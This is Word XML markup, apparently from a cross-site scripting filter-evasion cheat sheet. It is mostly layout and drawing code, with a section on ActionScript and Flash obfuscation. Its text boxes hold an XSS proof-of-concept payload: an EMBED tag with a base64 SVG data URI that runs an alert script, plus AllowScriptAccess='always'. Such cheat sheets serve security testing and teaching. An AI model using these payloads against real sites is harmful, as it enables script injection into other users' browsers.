      <w:r>
        <w:rPr>
          <w:spacing w:val="6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it's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>better</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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t>vector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Firefox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>because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does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require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-3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Flash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>turned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installed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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nEUrOO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one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="12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1379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119380</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5509260" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="683" name="Group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9260" cy="116205"/>
                          <a:chOff x="1614" y="188"/>
                          <a:chExt cx="8676" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="684" name="Freeform 686"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="188"/>
                            <a:ext cx="8676" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 10268 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 8676"/>
                              <a:gd name="T2" fmla="+- 0 370 188"/>
                              <a:gd name="T3" fmla="*/ 370 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8676"/>
                              <a:gd name="T6" fmla="+- 0 370 188"/>
                              <a:gd name="T7" fmla="*/ 370 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8676"/>
                              <a:gd name="T10" fmla="+- 0 370 188"/>
                              <a:gd name="T11" fmla="*/ 370 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8676"/>
                              <a:gd name="T14" fmla="+- 0 349 188"/>
                              <a:gd name="T15" fmla="*/ 349 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8676"/>
                              <a:gd name="T18" fmla="+- 0 346 188"/>
                              <a:gd name="T19" fmla="*/ 346 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8676"/>
                              <a:gd name="T22" fmla="+- 0 209 188"/>
                              <a:gd name="T23" fmla="*/ 209 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8676"/>
                              <a:gd name="T26" fmla="+- 0 188 188"/>
                              <a:gd name="T27" fmla="*/ 188 h 183"/>
                              <a:gd name="T28" fmla="+- 0 10268 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8676"/>
                              <a:gd name="T30" fmla="+- 0 188 188"/>
                              <a:gd name="T31" fmla="*/ 188 h 183"/>
                              <a:gd name="T32" fmla="+- 0 10289 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8676"/>
                              <a:gd name="T34" fmla="+- 0 209 188"/>
                              <a:gd name="T35" fmla="*/ 209 h 183"/>
                              <a:gd name="T36" fmla="+- 0 10289 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8676"/>
                              <a:gd name="T38" fmla="+- 0 349 188"/>
                              <a:gd name="T39" fmla="*/ 349 h 183"/>
                              <a:gd name="T40" fmla="+- 0 10272 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8676"/>
                              <a:gd name="T42" fmla="+- 0 370 188"/>
                              <a:gd name="T43" fmla="*/ 370 h 183"/>
                              <a:gd name="T44" fmla="+- 0 10268 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8676"/>
                              <a:gd name="T46" fmla="+- 0 370 188"/>
                              <a:gd name="T47" fmla="*/ 37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676" h="183">
                                <a:moveTo>
                                  <a:pt x="865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54" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8675" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8675" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8658" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="865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Text Box 685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88"/>
                            <a:ext cx="867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&lt;EMBED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SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH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A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWx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4" o:spid="_x0000_s1746" style="position:absolute;margin-left:80.7pt;margin-top:9.4pt;width:433.8pt;height:9.15pt;z-index:-15602688;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,188" coordsize="867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">
                <v:shape id="Freeform 686" o:spid="_x0000_s1747" style="position:absolute;left:1614;top:188;width:8676;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="86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eMecQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE78J+h/AW9iKaKipSjbL+A49WF8/P5m1b&#10;2rzUJqv12xtB2OMwM79h5svWVOJGjSssKxj0IxDEqdUFZwp+TrveFITzyBory6TgQQ6Wi4/OHGNt&#10;75zQ7egzESDsYlSQe1/HUro0J4Oub2vi4P3axqAPssmkbvAe4KaSwyiaSIMFh4Uca1rnlJbHP6Mg&#10;PZTd0/laGnfZbP12U6zWyThR6uuz/Z6B8NT6//C7vdcKJtMRvM6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XjHnEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m8654,182l21,182r-3,l,161r,-3l,21,21,,8654,r21,21l8675,161r-17,21l8654,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8654,370;21,370;18,370;0,349;0,346;0,209;21,188;8654,188;8675,209;8675,349;8658,370;8654,370" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 685" o:spid="_x0000_s1748" type="#_x0000_t202" style="position:absolute;left:1614;top:188;width:867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A8SMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3urGgkGjq4hUEAqlMR48PrPP&#10;ZDH7NmZXTf99t1DwOMzMN8xi1dtG3KnzxrGC8SgBQVw6bbhScCi2b1MQPiBrbByTgh/ysFoOXhaY&#10;affgnO77UIkIYZ+hgjqENpPSlzVZ9CPXEkfv7DqLIcqukrrDR4TbRr4nSSotGo4LNba0qam87G9W&#10;wfrI+Ye5fp2+83NuimKW8Gd6Uep12K/nIAL14Rn+b++0gnQ6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0DxI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&lt;EMBED</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="11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SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing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A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWx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7"/>
        <w:rPr>
          <w:sz w:val="3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5563235" cy="116205"/>
                <wp:effectExtent l="5715" t="1270" r="3175" b="6350"/>
                <wp:docPr id="680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3235" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8761" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="681" name="Freeform 6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custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8739 w 8761"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 8761"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 8761"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 8761"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 8761"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 8761"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 8761"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 8739 w 8761"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 8760 w 8761"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 8760 w 8761"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 8742 w 8761"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 8739 w 8761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761" h="183">
                                <a:moveTo>
                                  <a:pt x="873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739" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8760" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8760" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8742" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="87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Text Box 68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ucz0iaHR0cDovL3d3dy53My5vcmcv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1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MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs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1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aW5rIiB2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81" o:spid="_x0000_s1749" style="width:438.05pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="876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">
                <v:shape id="Freeform 683" o:spid="_x0000_s1750" style="position:absolute;width:8761;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="876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LGVcEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPUYvCMBCE3w/8D2EF387UU0SqUfRA8OnQ6g9YmrUt&#10;djehiVr//eXgwMdhZr5hVpueW/WgLjRODEzGGSiS0tlGKgOX8/5zASpEFIutEzLwogCb9eBjhbl1&#10;TznRo4iVShAJORqoY/S51qGsiTGMnSdJ3tV1jDHJrtK2w2eCc6u/smyuGRtJCzV6+q6pvBV3NqC9&#10;52M522VcTW98LcJPc9mTMaNhv12CitTHd/i/fbAG5osJ/J1JR0Cv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yxlXBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m8739,182l21,182r-3,l,161r,-3l,21,21,,8739,r21,21l8760,161r-18,21l8739,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8739,182;21,182;18,182;0,161;0,158;0,21;21,0;8739,0;8760,21;8760,161;8742,182;8739,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 682" o:spid="_x0000_s1751" type="#_x0000_t202" style="position:absolute;width:876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mkPMQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3upGD8FGVxFREAqlMR48PrPP&#10;ZDH7NmZXTf99VxB6HGbmG2a+7G0j7tR541jBeJSAIC6dNlwpOBTbjykIH5A1No5JwS95WC4Gb3PM&#10;tHtwTvd9qESEsM9QQR1Cm0npy5os+pFriaN3dp3FEGVXSd3hI8JtIydJkkqLhuNCjS2tayov+5tV&#10;sDpyvjHX79NPfs5NUXwm/JVelHof9qsZiEB9+A+/2jutIJ1O4Hk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5pDz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ucz0iaHR0cDovL3d3dy53My5vcmcv</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="11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MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="11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aW5rIiB2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2"/>
        <w:rPr>
          <w:sz w:val="7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5563235" cy="116205"/>
                <wp:effectExtent l="5715" t="0" r="3175" b="7620"/>
                <wp:docPr id="677" name="Group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3235" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8761" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="678" name="Freeform 68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custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8739 w 8761"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 8761"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 8761"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 8761"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 8761"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 8761"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 8761"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 8739 w 8761"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 8760 w 8761"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 8760 w 8761"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 8742 w 8761"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 8739 w 8761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761" h="183">
                                <a:moveTo>
                                  <a:pt x="873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739" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8760" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8760" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8742" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="87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Text Box 67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ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw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9"/>
                                  <w:sz w:val="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IiBpZD0ieHNzIj48c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2NyaXB0IHR5cGU9InRleH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78" o:spid="_x0000_s1752" style="width:438.05pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="876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">
                <v:shape id="Freeform 680" o:spid="_x0000_s1753" style="position:absolute;width:8761;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="876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0f774A&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPzYrCMBC+L+w7hFnwtqarotI1igrCnkSrDzA0Y1vs&#10;TEITtb795iB4/Pj+F6ueW3WnLjRODPwMM1AkpbONVAbOp933HFSIKBZbJ2TgSQFWy8+PBebWPeRI&#10;9yJWKoVIyNFAHaPPtQ5lTYxh6DxJ4i6uY4wJdpW2HT5SOLd6lGVTzdhIaqjR07am8lrc2ID2ng/l&#10;ZJNxNb7ypQj75rwjYwZf/foXVKQ+vsUv9581MJ2ltelMOgJ6+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DdH+++AAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3ducmV2&#10;LnhtbFBLBQYAAAAABAAEAPUAAACDAwAAAAA=&#10;" path="m8739,182l21,182r-3,l,161r,-3l,21,21,,8739,r21,21l8760,161r-18,21l8739,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8739,182;21,182;18,182;0,161;0,158;0,21;21,0;8739,0;8760,21;8760,161;8742,182;8739,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 679" o:spid="_x0000_s1754" type="#_x0000_t202" style="position:absolute;width:876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hGasUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UJvdWNHtKauooUBaEgxnjw+Jp9&#10;JovZtzG7avz3XaHgcZiZb5jpvLeNuFLnjWMFo2ECgrh02nClYF+s3j9B+ICssXFMCu7kYT57fZli&#10;pt2Nc7ruQiUihH2GCuoQ2kxKX9Zk0Q9dSxy9o+sshii7SuoObxFuGzlOklRaNBwXamzpu6bytLtY&#10;BYsD50tz3vxu82NuimKS8E96Uupt0C++QATqwzP8315rBenHBB5n4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EZq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ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="79"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> 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IiBpZD0ieHNzIj48c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2NyaXB0IHR5cGU9InRleH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1"/>
        <w:rPr>
          <w:sz w:val="7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5563235" cy="116205"/>
                <wp:effectExtent l="5715" t="7620" r="3175" b="0"/>
                <wp:docPr id="674" name="Group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3235" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8761" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="675" name="Freeform 67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custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8739 w 8761"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 8761"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 8761"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 8761"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 8761"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 8761"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 8761"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 8739 w 8761"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 8760 w 8761"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 8760 w 8761"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 8742 w 8761"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 8739 w 8761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761" h="183">
                                <a:moveTo>
                                  <a:pt x="873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739" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8760" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8760" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8742" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="87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Text Box 67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76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QvZWNtYXNjcmlwdCI+YWxlcnQoIlh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TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="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type="image/svg+xml"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AllowScriptAccess="al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75" o:spid="_x0000_s1755" style="width:438.05pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="876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">
                <v:shape id="Freeform 677" o:spid="_x0000_s1756" style="position:absolute;width:8761;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="876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wccIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPzYrCQBCE7wu+w9DC3taJ+6MSHUUFYU+yRh+gybRJ&#10;MN0zZGY1+/Y7guCxqKqvqMWq51ZdqQuNEwPjUQaKpHS2kcrA6bh7m4EKEcVi64QM/FGA1XLwssDc&#10;upsc6FrESiWIhBwN1DH6XOtQ1sQYRs6TJO/sOsaYZFdp2+EtwbnV71k20YyNpIUaPW1rKi/FLxvQ&#10;3vNP+bnJuPq48LkI++a0I2Neh/16DipSH5/hR/vbGphMv+B+Jh0Bv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3LBxwgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m8739,182l21,182r-3,l,161r,-3l,21,21,,8739,r21,21l8760,161r-18,21l8739,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8739,182;21,182;18,182;0,161;0,158;0,21;21,0;8739,0;8760,21;8760,161;8742,182;8739,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 676" o:spid="_x0000_s1757" type="#_x0000_t202" style="position:absolute;width:876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fSGMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UJvdWNPcQa3YgUC4VCMaaHHp/Z&#10;l2Qx+zZmt5r+e1coeBxm5htmtR5tJ840eONYwWyagCCunDbcKPgu359fQfiArLFzTAr+yMM6f3xY&#10;YabdhQs670MjIoR9hgraEPpMSl+1ZNFPXU8cvdoNFkOUQyP1gJcIt518SZJUWjQcF1rs6a2l6rj/&#10;tQo2P1xszenrsCvqwpTlIuHP9KjU02TcLEEEGsM9/N/+0ArSeQq3M/EI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19IY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QvZWNtYXNjcmlwdCI+YWxlcnQoIlh</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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type="image/svg+xml"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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AllowScriptAccess="al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1"/>
        <w:rPr>
          <w:sz w:val="7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795020" cy="116205"/>
                <wp:effectExtent l="5715" t="5715" r="0" b="1905"/>
                <wp:docPr id="671" name="Group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5020" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1252" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="672" name="Freeform 67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52" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 1230 w 1252"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 1252"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 1252"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 1252"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 1252"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 1252"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 1252"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 1230 w 1252"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 1251 w 1252"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 1251 w 1252"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 1233 w 1252"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 1230 w 1252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252" h="183">
                                <a:moveTo>
                                  <a:pt x="123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230" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1251" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1251" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1233" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123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Text Box 67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ways"&gt;&lt;/EMBED&gt;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72" o:spid="_x0000_s1758" style="width:62.6pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="125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">
                <v:shape id="Freeform 674" o:spid="_x0000_s1759" style="position:absolute;width:1252;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="125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oB6cMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE78J+h/AWvNlUhSpdo+wuCPYk/ru/bZ5t&#10;tXnpNlHrtzeC4HGYmd8ws0VnanGl1lWWFQyjGARxbnXFhYL9bjmYgnAeWWNtmRTcycFi/tGbYart&#10;jTd03fpCBAi7FBWU3jeplC4vyaCLbEMcvKNtDfog20LqFm8Bbmo5iuNEGqw4LJTY0G9J+Xl7MQrG&#10;SXdwS31cH/6y1b36Mdnw/5Qp1f/svr9AeOr8O/xqr7SCZDKC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oB6cMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1230,182l21,182r-3,l,161r,-3l,21,21,,1230,r21,21l1251,161r-18,21l1230,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1230,182;21,182;18,182;0,161;0,158;0,21;21,0;1230,0;1251,21;1251,161;1233,182;1230,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 673" o:spid="_x0000_s1760" type="#_x0000_t202" style="position:absolute;width:125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BxgMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXmF3nRTC6mNriLSQqFQTOKhx2f2&#10;mSxm38bsVtN/3xUKHoeZ+YZZrgfbigv13jhW8DRNQBBXThuuFezL98kchA/IGlvHpOCXPKxX49ES&#10;M+2unNOlCLWIEPYZKmhC6DIpfdWQRT91HXH0jq63GKLsa6l7vEa4beUsSVJp0XBcaLCjbUPVqfix&#10;CjbfnL+Z89dhlx9zU5avCX+mJ6UeH4bNAkSgIdzD/+0PrSB9eYb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oHGA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ways"&gt;&lt;/EMBED&gt;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4"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:r>
        <w:t>Using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ActionScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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>Flash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Obfuscation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="13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1635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130175</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="756285"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="668" name="Group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756285"/>
                          <a:chOff x="1614" y="205"/>
                          <a:chExt cx="8700" cy="1191"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="669" name="Freeform 671"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="205"/>
                            <a:ext cx="8700" cy="1191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1396 205"/>
                              <a:gd name="T3" fmla="*/ 1396 h 1191"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8700"/>
                              <a:gd name="T6" fmla="+- 0 1396 205"/>
                              <a:gd name="T7" fmla="*/ 1396 h 1191"/>
